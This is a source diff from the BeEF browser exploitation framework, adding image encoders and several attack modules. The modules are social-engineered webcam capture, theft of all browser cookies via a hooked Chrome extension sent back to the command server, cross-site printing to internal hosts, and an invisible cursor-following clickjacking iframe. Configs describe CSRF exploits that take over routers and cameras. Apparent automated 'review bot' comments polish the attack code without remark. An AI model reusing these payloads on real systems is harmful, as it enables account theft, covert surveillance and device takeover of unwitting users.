for (var x:int=0; x<8; x++) {
var P:uint = img.getPixel32(xpos+x,ypos+y);
var R:Number = Number((P>>16)&0xFF);
var G:Number = Number((P>> 8)&0xFF);
var B:Number = Number((P )&0xFF);
YDU[pos]=((( 0.29900)*R+( 0.58700)*G+( 0.11400)*B))-128;
UDU[pos]=(((-0.16874)*R+(-0.33126)*G+( 0.50000)*B));
VDU[pos]=((( 0.50000)*R+(-0.41869)*G+(-0.08131)*B));
pos++;
}
}
}
/**
* Constructor for JPEGEncoder class
*
* @param quality The quality level between 1 and 100 that detrmines the
* level of compression used in the generated JPEG
* @langversion ActionScript 3.0
* @playerversion Flash 9.0
* @tiptext
*/
public function JPGEncoder(quality:Number = 50)
{
if (quality <= 0) {
quality = 1;
}
if (quality > 100) {
quality = 100;
}
var sf:int = 0;
if (quality < 50) {
sf = int(5000 / quality);
} else {
sf = int(200 - quality*2);
}
// Create tables
initHuffmanTbl();
initCategoryNumber();
initQuantTables(sf);
}
/**
* Created a JPEG image from the specified BitmapData
*
* @param image The BitmapData that will be converted into the JPEG format.
* @return a ByteArray representing the JPEG encoded image data.
* @langversion ActionScript 3.0
* @playerversion Flash 9.0
* @tiptext
*/
public function encode(image:BitmapData):ByteArray
{
// Initialize bit writer
byteout = new ByteArray();
bytenew=0;
bytepos=7;
// Add JPEG headers
writeWord(0xFFD8); // SOI
writeAPP0();
writeDQT();
writeSOF0(image.width,image.height);
writeDHT();
writeSOS();
// Encode 8x8 macroblocks
var DCY:Number=0;
var DCU:Number=0;
var DCV:Number=0;
bytenew=0;
bytepos=7;
for (var ypos:int=0; ypos<image.height; ypos+=8) {
for (var xpos:int=0; xpos<image.width; xpos+=8) {
RGB2YUV(image, xpos, ypos);
DCY = processDU(YDU, fdtbl_Y, DCY, YDC_HT, YAC_HT);
DCU = processDU(UDU, fdtbl_UV, DCU, UVDC_HT, UVAC_HT);
DCV = processDU(VDU, fdtbl_UV, DCV, UVDC_HT, UVAC_HT);
}
}
// Do the bit alignment of the EOI marker
if ( bytepos >= 0 ) {
var fillbits:BitString = new BitString();
fillbits.len = bytepos+1;
fillbits.val = (1<<(bytepos+1))-1;
writeBits(fillbits);
}
writeWord(0xFFD9); //EOI
return byteout;
}
}
}


@@ -0,0 +1,141 @@
/*
Copyright (c) 2008, Adobe Systems Incorporated
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are
met:
* Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
* Neither the name of Adobe Systems Incorporated nor the names of its
contributors may be used to endorse or promote products derived from
this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
package com.adobe.images
{
import flash.geom.*;
import flash.display.Bitmap;
import flash.display.BitmapData;
import flash.utils.ByteArray;
/**
* Class that converts BitmapData into a valid PNG
*/
public class PNGEncoder
{
/**
* Created a PNG image from the specified BitmapData
*
* @param image The BitmapData that will be converted into the PNG format.
* @return a ByteArray representing the PNG encoded image data.
* @langversion ActionScript 3.0
* @playerversion Flash 9.0
* @tiptext
*/
public static function encode(img:BitmapData):ByteArray {
// Create output byte array
var png:ByteArray = new ByteArray();
// Write PNG signature
png.writeUnsignedInt(0x89504e47);
png.writeUnsignedInt(0x0D0A1A0A);
// Build IHDR chunk
var IHDR:ByteArray = new ByteArray();
IHDR.writeInt(img.width);
IHDR.writeInt(img.height);
IHDR.writeUnsignedInt(0x08060000); // 32bit RGBA
IHDR.writeByte(0);
writeChunk(png,0x49484452,IHDR);
// Build IDAT chunk
var IDAT:ByteArray= new ByteArray();
for(var i:int=0;i < img.height;i++) {
// no filter
IDAT.writeByte(0);
var p:uint;
var j:int;
if ( !img.transparent ) {
for(j=0;j < img.width;j++) {
p = img.getPixel(j,i);
IDAT.writeUnsignedInt(
uint(((p&0xFFFFFF) << 8)|0xFF));
}
} else {
for(j=0;j < img.width;j++) {
p = img.getPixel32(j,i);
IDAT.writeUnsignedInt(
uint(((p&0xFFFFFF) << 8)|
(p>>>24)));
}
}
}
IDAT.compress();
writeChunk(png,0x49444154,IDAT);
// Build IEND chunk
writeChunk(png,0x49454E44,null);
// return PNG
return png;
}
private static var crcTable:Array;
private static var crcTableComputed:Boolean = false;
private static function writeChunk(png:ByteArray,
type:uint, data:ByteArray):void {
if (!crcTableComputed) {
crcTableComputed = true;
crcTable = [];
var c:uint;
for (var n:uint = 0; n < 256; n++) {
c = n;
for (var k:uint = 0; k < 8; k++) {
if (c & 1) {
c = uint(uint(0xedb88320) ^
uint(c >>> 1));
} else {
c = uint(c >>> 1);
}
}
crcTable[n] = c;
}
}
var len:uint = 0;
if (data != null) {
len = data.length;
}
png.writeUnsignedInt(len);
var p:uint = png.position;
png.writeUnsignedInt(type);
if ( data != null ) {
png.writeBytes(data);
}
var e:uint = png.position;
png.position = p;
c = 0xffffffff;
for (var i:int = 0; i < (e-p); i++) {
c = uint(crcTable[
(c ^ png.readUnsignedByte()) &
uint(0xff)] ^ uint(c >>> 8));
}
c = uint(c^uint(0xffffffff));
png.position = e;
png.writeUnsignedInt(c);
}
}
}


@@ -0,0 +1,106 @@
package com.foxarc.util{
import flash.utils.ByteArray;
public class Base64 {
private static const encodeChars:Array =
['A','B','C','D','E','F','G','H',
'I','J','K','L','M','N','O','P',
'Q','R','S','T','U','V','W','X',
'Y','Z','a','b','c','d','e','f',
'g','h','i','j','k','l','m','n',
'o','p','q','r','s','t','u','v',
'w','x','y','z','0','1','2','3',
'4','5','6','7','8','9','+','/'];
private static const decodeChars:Array =
[-1, -1, -1, -1, -1, -1, -1, -1,
-1, -1, -1, -1, -1, -1, -1, -1,
-1, -1, -1, -1, -1, -1, -1, -1,
-1, -1, -1, -1, -1, -1, -1, -1,
-1, -1, -1, -1, -1, -1, -1, -1,
-1, -1, -1, 62, -1, -1, -1, 63,
52, 53, 54, 55, 56, 57, 58, 59,
60, 61, -1, -1, -1, -1, -1, -1,
-1, 0, 1, 2, 3, 4, 5, 6,
7, 8, 9, 10, 11, 12, 13, 14,
15, 16, 17, 18, 19, 20, 21, 22,
23, 24, 25, -1, -1, -1, -1, -1,
-1, 26, 27, 28, 29, 30, 31, 32,
33, 34, 35, 36, 37, 38, 39, 40,
41, 42, 43, 44, 45, 46, 47, 48,
49, 50, 51, -1, -1, -1, -1, -1];
public static function encode(data:ByteArray):String {
var out:Array = [];
var i:int = 0;
var j:int = 0;
var r:int = data.length % 3;
var len:int = data.length - r;
var c:int;
while (i < len) {
c = data[i++] << 16 | data[i++] << 8 | data[i++];
out[j++] = encodeChars[c >> 18] + encodeChars[c >> 12 & 0x3f] + encodeChars[c >> 6 & 0x3f] + encodeChars[c & 0x3f];
}
if (r == 1) {
c = data[i++];
out[j++] = encodeChars[c >> 2] + encodeChars[(c & 0x03) << 4] + "==";
}
else if (r == 2) {
c = data[i++] << 8 | data[i++];
out[j++] = encodeChars[c >> 10] + encodeChars[c >> 4 & 0x3f] + encodeChars[(c & 0x0f) << 2] + "=";
}
return out.join('');
}
public static function decode(str:String):ByteArray {
var c1:int;
var c2:int;
var c3:int;
var c4:int;
var i:int;
var len:int;
var out:ByteArray;
len = str.length;
i = 0;
out = new ByteArray();
while (i < len) {
// c1
do {
c1 = decodeChars[str.charCodeAt(i++) & 0xff];
} while (i < len && c1 == -1);
if (c1 == -1) {
break;
}
// c2
do {
c2 = decodeChars[str.charCodeAt(i++) & 0xff];
} while (i < len && c2 == -1);
if (c2 == -1) {
break;
}
out.writeByte((c1 << 2) | ((c2 & 0x30) >> 4));
// c3
do {
c3 = str.charCodeAt(i++) & 0xff;
if (c3 == 61) {
return out;
}
c3 = decodeChars[c3];
} while (i < len && c3 == -1);
if (c3 == -1) {
break;
}
out.writeByte(((c2 & 0x0f) << 4) | ((c3 & 0x3c) >> 2));
// c4
do {
c4 = str.charCodeAt(i++) & 0xff;
if (c4 == 61) {
return out;
}
c4 = decodeChars[c4];
} while (i < len && c4 == -1);
if (c4 == -1) {
break;
}
out.writeByte(((c3 & 0x03) << 6) | c4);
}
return out;
}
}
}

Binary file not shown.


@@ -0,0 +1,63 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
require 'base64'
class Webcam < BeEF::Core::Command
def pre_send
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/browser/webcam/takeit.swf', '/takeit', 'swf')
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/browser/webcam/swfobject.js', '/swfobject', 'js')
end
def self.options
configuration = BeEF::Core::Configuration.instance
social_engineering_title = "This website is using Adobe Flash"
social_engineering_text = "In order to work with the programming framework this website is using, you need to allow the Adobe Flash Player Settings. If you use the new Ajax and HTML5 features in conjunction with Adobe Flash Player, it will increase your user experience."
no_of_pictures = 20
interval = 1000
return [
{'name' => 'social_engineering_title',
'description' => 'The title that is shown to the victim.',
'ui_label' => 'Social Engineering Title',
'value' => social_engineering_title,
'width' => '100px' }, {
'name' => 'social_engineering_text',
'description' => 'The social engineering text you want to show to convince the user to click the Allow button.',
'ui_label' => 'Social Engineering Text',
'value' => social_engineering_text,
'width' => '300px',
'type' => 'textarea' }, {
'name' => 'no_of_pictures',
'description' => 'The number of pictures you want to take after the victim clicked "allow".',
'ui_label' => 'Number of pictures',
'value' => no_of_pictures,
'width' => '100px' }, {
'name' => 'interval',
'description' => 'The interval in which pictures are taken.',
'ui_label' => 'Interval to take pictures (ms)',
'value' => interval,
'width' => '100px' }
]
end
def post_execute
content = {}
content["result"] = @datastore["result"] if not @datastore["result"].nil?
content["picture"] = @datastore["picture"] if not @datastore["picture"].nil?
save content
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/takeit.swf')
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/swfobject.js')
end
end
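Review bot: `post_execute` copies `@datastore["result"]` and `@datastore["picture"]` into `content` exactly as the hooked browser sent them, with no size or format check before `save content`. Anything a browser posts back is untrusted input to the server, and whether `save` or its callers bound or sanitise it is not visible in this file. At minimum I would add a comment above the method, such as `# @datastore values come from the hooked browser and are untrusted; validate before storing or rendering`. The same pattern appears in the `post_execute` of Get_all_cookies, Cross_site_printing, Clickjacking, Fake_flash_update and Gmail_phishing later in this commit. Separately, the local `configuration` in `self.options` and `require 'base64'` are not used anywhere in this file and can be removed.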

File diff suppressed because one or more lines are too long

Binary file not shown.


@@ -0,0 +1,29 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
beef.execute(function() {
the_url = "<%== @url %>";
if (the_url != 'default_all') {
chrome.cookies.getAll({url:the_url}, function(cookies){
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'cookies: ' + JSON.stringify(cookies));
})
} else {
chrome.cookies.getAll({}, function(cookies){
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'cookies: ' + JSON.stringify(cookies));
})
}
});
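Review bot: `the_url` is assigned without `var`, so it becomes a property of the page's global object instead of a local of the callback; declare it as `var the_url = ...`. The two branches differ only in the filter object passed to `chrome.cookies.getAll`, so one call with `var filter = (the_url != 'default_all') ? {url: the_url} : {};` would remove the duplicated callback. The option value is also placed inside a double-quoted JavaScript literal through `<%== %>`; whether that tag escapes quotes depends on the template engine configuration, which is not visible on this page.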


@@ -0,0 +1,26 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
beef:
module:
get_all_cookies:
enable: true
category: "Chrome Extensions"
name: "Get All Cookies"
description: "Steal cookies, even HttpOnly cookies, providing the hooked extension has cookies access.<br />If a URL is not specified then <em>all</em> cookies are returned (this can be a lot!)"
authors: ["mh"]
target:
working: ["C"]
not_working: ["All"]
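Review bot: `not_working: ["All"]` is spelled differently from the `"ALL"` token used by the other module configs in this commit (for example `not_working: ["ALL"]` and `user_notify: ['ALL']`). If the loader compares browser tokens case-sensitively, which cannot be confirmed from this page, this entry would not match anything. I would write it as `not_working: ["ALL"]` for consistency.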


@@ -0,0 +1,31 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
class Get_all_cookies < BeEF::Core::Command
def self.options
return [
{'name' =>'url', 'ui_label'=>'Domain (e.g. http://facebook.com)', 'value' => 'default_all'}
]
end
def post_execute
content = {}
content['Return'] = @datastore['return']
save content
end
end


@@ -19,7 +19,7 @@ beef:
module:
Dlink_dcs_series_csrf:
enable: true
category: ["Exploits","Camera"]
category: ["Exploits", "Camera"]
name: "Dlink DCS series CSRF"
description: "Attempts to change the password on a Dlink DCS series camera."
authors: ["bcoles"]


@@ -17,7 +17,7 @@ beef:
module:
bt_home_hub_csrf:
enable: true
category: ["Exploits","Router"]
category: ["Exploits", "Router"]
name: "BT Home Hub CSRF"
description: "Attempts to enable remote administration and change the tech password on a BT Home Hub wireless router."
authors: ["bcoles"]


@@ -17,7 +17,7 @@ beef:
module:
comtrend_ct5367_csrf:
enable: true
category: ["Exploits","Router"]
category: ["Exploits", "Router"]
name: "Comtrend CT-5367 CSRF"
description: "Attempts to enable remote administration and change the password on a Comtrend CT-5367 router."
authors: ["bcoles"]


@@ -17,7 +17,7 @@ beef:
module:
comtrend_ct5624_csrf:
enable: true
category: ["Exploits","Router"]
category: ["Exploits", "Router"]
name: "Comtrend CT-5624 CSRF"
description: "Attempts to enable remote administration and change the password on a Comtrend CT-5624 router."
authors: ["bcoles"]


@@ -17,7 +17,7 @@ beef:
module:
dlink_dsl500t_csrf:
enable: true
category: ["Exploits","Router"]
category: ["Exploits", "Router"]
name: "D-Link DSL500T CSRF"
description: "Attempts to change the password on a D-Link DSL500T router."
authors: ["bcoles"]


@@ -17,7 +17,7 @@ beef:
module:
Huawei_smartax_mt880_csrf:
enable: true
category: ["Exploits","Router"]
category: ["Exploits", "Router"]
name: "Huawei SmartAX MT880 CSRF"
description: "Attempts to add an administrator account on a Huawei SmartAX MT880 router."
authors: ["bcoles"]


@@ -17,7 +17,7 @@ beef:
module:
linksys_befsr41_csrf:
enable: true
category: ["Exploits","Router"]
category: ["Exploits", "Router"]
name: "Linksys BEFSR41 CSRF"
description: "Attempts to enable remote administration and change the password on a Linksys BEFSR41 router."
authors: ["Martin Barbella"]


@@ -17,7 +17,7 @@ beef:
module:
linksys_wrt54g2_csrf:
enable: true
category: ["Exploits","Router"]
category: ["Exploits", "Router"]
name: "Linksys WRT54G2 CSRF"
description: "Attempts to enable remote administration and change the password on a Linksys WRT54G2 router."
authors: ["Martin Barbella"]


@@ -17,7 +17,7 @@ beef:
module:
linksys_wrt54g_csrf:
enable: true
category: ["Exploits","Router"]
category: ["Exploits", "Router"]
name: "Linksys WRT54G CSRF"
description: "Attempts to enable remote administration and change the password on a Linksys WRT54G router."
authors: ["Martin Barbella"]


@@ -17,7 +17,7 @@ beef:
module:
Netgear_gs108t_csrf:
enable: true
category: ["Exploits","Switch"]
category: ["Exploits", "Switch"]
name: "Netgear GS108T CSRF"
description: "Attempts to change the password on a Netgear GS108T managed switch."
authors: ["Bart Leppens"]


@@ -0,0 +1,69 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
beef.execute(function() {
var target_ip = "<%= @ip %>";
var target_port = "<%= @port %>";
// send a request
function send_msg(ip, port) {
// create iframe
var iframe = document.createElement("iframe");
iframe.setAttribute("id","ipc_cross_site_printing_<%= @command_id %>");
iframe.setAttribute("style", "visibility:hidden;width:1px;height:1px;");
document.body.appendChild(iframe);
iframe = document.getElementById("ipc_cross_site_printing_<%= @command_id %>");
// create form
var action = "http://" + ip + ":" + port + "/";
myform=document.createElement("form");
myform.setAttribute("name","data");
myform.setAttribute("method","post");
myform.setAttribute("enctype","multipart/form-data");
myform.setAttribute("action",action);
iframe.contentWindow.document.body.appendChild(myform);
// create message textarea
myExt = document.createElement("textarea");
myExt.setAttribute("id","msg_<%= @command_id %>");
myExt.setAttribute("name","msg_<%= @command_id %>");
myExt.setAttribute("wrap","none");
myExt.setAttribute("rows","70");
myExt.setAttribute("cols","100");
myform.appendChild(myExt);
// send message
iframe.contentWindow.document.getElementById("msg_<%= @command_id %>").value = "<%= @msg.gsub(/"/, '\\"').gsub(/\r?\n/, '\\n') %>";
myform.submit();
// clean up
setTimeout('document.body.removeChild(document.getElementById("ipc_cross_site_printing_<%= @command_id %>"));', 15000);
}
// validate target
if (!target_port || !target_ip || isNaN(target_port)) {
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=malformed target host or target port');
} else if (target_port > 65535 || target_port < 0) {
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=invalid target port');
// send request and wait for reply
} else {
send_msg(target_ip, target_port);
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Message sent');
}
});
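Review bot: In `send_msg`, `myform` and `myExt` are assigned without `var` and leak into the page's global scope, and the clean-up passes a string to `setTimeout`, which is evaluated the same way as `eval`. Declare both with `var` and pass a function instead, e.g. `setTimeout(function () { document.body.removeChild(iframe); }, 15000);`. In the validation block `target_port` is still a string when it is compared with `65535` and `0`; converting it once with `parseInt(target_port, 10)` would make the range check explicit instead of relying on coercion.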


@@ -0,0 +1,25 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
beef:
module:
cross_site_printing:
enable: true
category: "IPEC"
name: "Cross-Site Printing (XSP)"
description: "Using Inter-protocol Exploitation/Communication (IPEC) the hooked browser will send a message to a listening print port (9100 by default) on the target specified in the 'Target Address' input field.<br /><br />The target address can be on the hooked browser's subnet which is potentially not directly accessible from the Internet."
authors: ["bcoles"]
target:
working: ["FF"]


@@ -0,0 +1,77 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
class Cross_site_printing < BeEF::Core::Command
def self.options
return [
{'name'=>'ip', 'ui_label' => 'Target Address', 'value' => 'localhost'},
{'name'=>'port', 'ui_label' => 'Target Port', 'value' => '9100'},
{'name'=>'msg', 'ui_label' => 'Message', 'description' => 'Message to print', 'type'=>'textarea', 'value'=>"**********************************************************************
.O,
lkOl
od cOc
'X, cOo.
cX, ,dkc.
BeEF ;Kd. ,odo,.
.dXl . .:xkl'
'OKc .;c' ,oOk:
,kKo. .cOkc. .lOk:.
.dXx. :KWKo. 'dXd.
.oXx. cXWW0c..dXd.
oW0 .OWWWNd.'KK.
....,;lkNWx KWWWWX:'XK.
,o:, .,:odkO00XNK0Okxdlc,. .KWWWWWWddWd
K::Ol .:d0NXK0OkxdoxO' .lXWWWWWWWWKW0
od d0. .l0NKOxdooooooox0. .,cdOXWWWWWWWWWWWWWx
:O ;K; ;kN0kooooooooooooK: .':ok0NWWWWWWWWWWWWWWWWWWK.
'X .Kl ;KNOdooooooooooooooXkkXWWWWWWWWWWWWWWWWWWWWWWWNd.
.N. o. .Kl 'OW0doooooooooooooodkXWWWWWWWWWWWWWWWWWWWWWWWW0l.
0l oK' .kO:';kNNkoooooooooooook0XWWWWWWWWWWWWWWWWWWWWWWWKx:.
lX.,WN: .:c:xWkoooooooooood0NWW0OWWWWWWWWWWWWWWWWWWWKo.
0O.0WWk' .XKoooooooooooONWWNo dWWWWWWWWWWWWWWWWWl
oKkNWWWX00NWXdooooooooxXWWNk' dWWWWWWWWWWWWWWWWX
.cONWWWWWWWWOoooooooONWWK:...c0WWWWWWWWWWWWWWWWWW:
.;oONWWWWxooooodKWWWWWWWWWWWWWWWWWWWWWWWWWWWWWX.
'XW0oooookNWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWd
oW0ooooo0WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWO
;NXdooodKWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWx
;xkOOdooooxOO0KNWWWWWWWWWWWWWWWWWWWWWWWWWWWWWX.
.NOoddxkkkkxxdoookKWWWWWWWWWWWWWWWWWWWWWWWWWWX'
:KNWWWWWWWWWWX0xooONWWWWWWWWWWWWWWWWWWWWWWWk.
.xNXxKWWWWWWWOXWWXxoKWWWWWWWWWWWWWWWWWWWWNk'
OWl cNWWWWWWWk oNWNxKWWWWWWWWWWWWWWWWWNOl.
,Wk xWWWWWWWWd xWWNWWWWWWWWWWWWXOdc,.
.N0 lOXNX0x; .KWWWWWWWWWWWNkc.
:NO, 'lXWWWWWWWWWNk:.
.dXN0OkxkO0NWWWWWWWWWWKl.
.';o0WWWWWWWWWWWNk;
.cxOKXKKOd;.
**********************************************************************", 'width'=>'200px' },
]
end
def post_execute
content = {}
content['result'] = @datastore['result'] if not @datastore['result'].nil?
content['fail'] = @datastore['fail'] if not @datastore['fail'].nil?
if content.empty?
content['fail'] = 'No data was returned.'
end
save content
end
end
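Review bot: The default `msg` value is a string literal of about forty lines embedded in the middle of the options array, which makes `self.options` hard to read and to diff. I would move the text to a frozen class-level constant defined above the method and reference it with `'value' => DEFAULT_MSG` (the constant name is a suggestion). In `post_execute`, `if not @datastore['result'].nil?` reads more naturally as `unless @datastore['result'].nil?`.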


@@ -19,7 +19,8 @@ beef:
enable: true
category: "Misc"
name: "iFrame Sniffer"
description: "This module attempts to do framesniffing (aka Leaky Frame). It will append leakyframe.js (written by Paul Stone) to the DOM and check for specified anchors to be present on a url.<br />For more information, refer to <a href='http://www.contextis.co.uk/research/blog/framesniffing/'>http://www.contextis.co.uk/research/blog/framesniffing/</a>"
description: "This module attempts to do framesniffing (aka Leaky Frame). It will append leakyframe.js (written by Paul Stone) to the DOM and check for specified anchors to be present on a URL.<br />For more information, refer to <a href='http://www.contextis.co.uk/research/blog/framesniffing/'>http://www.contextis.co.uk/research/blog/framesniffing/</a>"
authors: ["Bart Leppens"]
target:
working: "S"
working: ["S", "IE"]
not_working: ["ALL"]


@@ -0,0 +1,92 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
beef.execute(function() {
var offset_top = "<%= @offset_top %>";
var offset_left = "<%= @offset_left %>";
var url = "<%= @url %>";
var debug = <%= @debug %>;
if (debug) opacity = 10; else opacity = 0;
// create container
var cjcontainer = document.createElement('div');
cjcontainer.id = "cjcontainer";
cjcontainer.setAttribute("style", "-moz-opacity:"+opacity);
cjcontainer.style.zIndex = 999;
cjcontainer.style.border = "none";
cjcontainer.style.width = "30px";
cjcontainer.style.height = "20px";
cjcontainer.style.overflow = "hidden";
cjcontainer.style.position = "absolute";
cjcontainer.style.opacity = opacity;
cjcontainer.style.filter = "alpha(opacity="+opacity+")";
cjcontainer.style.cursor = "default";
document.body.appendChild(cjcontainer);
// create iframe
var cjiframe = document.createElement('iframe');
cjiframe.id = "cjiframe";
cjiframe.src = url;
cjiframe.scrolling = "no";
cjiframe.frameBorder = "0";
cjiframe.allowTransparency = "true";
cjiframe.style.overflow = "hidden";
cjiframe.style.position = "absolute";
cjiframe.style.top = offset_top+"px";
cjiframe.style.left = offset_left+"px";
cjiframe.style.width = "200px";
cjiframe.style.height = "100px";
cjiframe.style.border = "none";
cjiframe.style.cursor = "default";
cjcontainer.appendChild(cjiframe);
// followmouse code by rsnake
// http://ha.ckers.org/weird/followmouse.html
// modified by bcoles
function followmouse(e){
var xcoord = 0;
var ycoord = 0;
var gettrailobj = function() {
if (document.getElementById)
return document.getElementById("cjcontainer").style;
else if (document.all)
return document.all.container.style;
}
if (typeof e != "undefined") {
xcoord += e.pageX - 10;
ycoord += e.pageY - 15;
} else if (typeof window.event != "undefined") {
xcoord += document.body.scrollLeft + event.clientX;
ycoord += document.body.scrollTop + event.clientY;
}
var docwidth = document.all ? document.body.scrollLeft + document.body.clientWidth : pageXOffset+window.innerWidth - 15;
var docheight = document.all ? Math.max(document.body.scrollHeight, document.body.clientHeight) : Math.max(document.body.offsetHeight, window.innerHeight)
gettrailobj().left = xcoord + "px";
gettrailobj().top = ycoord + "px";
}
// hook to mousemove event
if (window.addEventListener) {
window.addEventListener('mousemove', followmouse, false);
} else if (window.attachEvent) {
window.attachEvent('mousemove', followmouse);
}
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'clickjack=hooked mousemove event');
});
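Review bot: `opacity` is assigned without `var` on the `if (debug)` line and so becomes a page global, and `docwidth` and `docheight` in `followmouse` are computed on every mousemove but never read. Declare `var opacity = debug ? 10 : 0;` and drop the two unused assignments. `debug` is emitted unquoted by `var debug = <%= @debug %>;`, so any option value other than `true` or `false` ends up as raw script text; the Ruby side offers only those two values in a combobox, but whether the server enforces that is not visible here.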


@@ -0,0 +1,27 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
beef:
module:
clickjacking:
enable: true
category: "Social Engineering"
name: "Clickjacking"
description: "This module serves as a template for clickjacking attacks.<br />Simply specify the target URL and the offset (in pixels) for the iframe content. The iframe will follow the mouse cursor.<br />Debug mode creates a visible iframe for testing purposes."
authors: ["bcoles"]
target:
user_notify: ["FF", "C"]
not_working: ["IE"]


@@ -0,0 +1,35 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
class Clickjacking < BeEF::Core::Command
def self.options
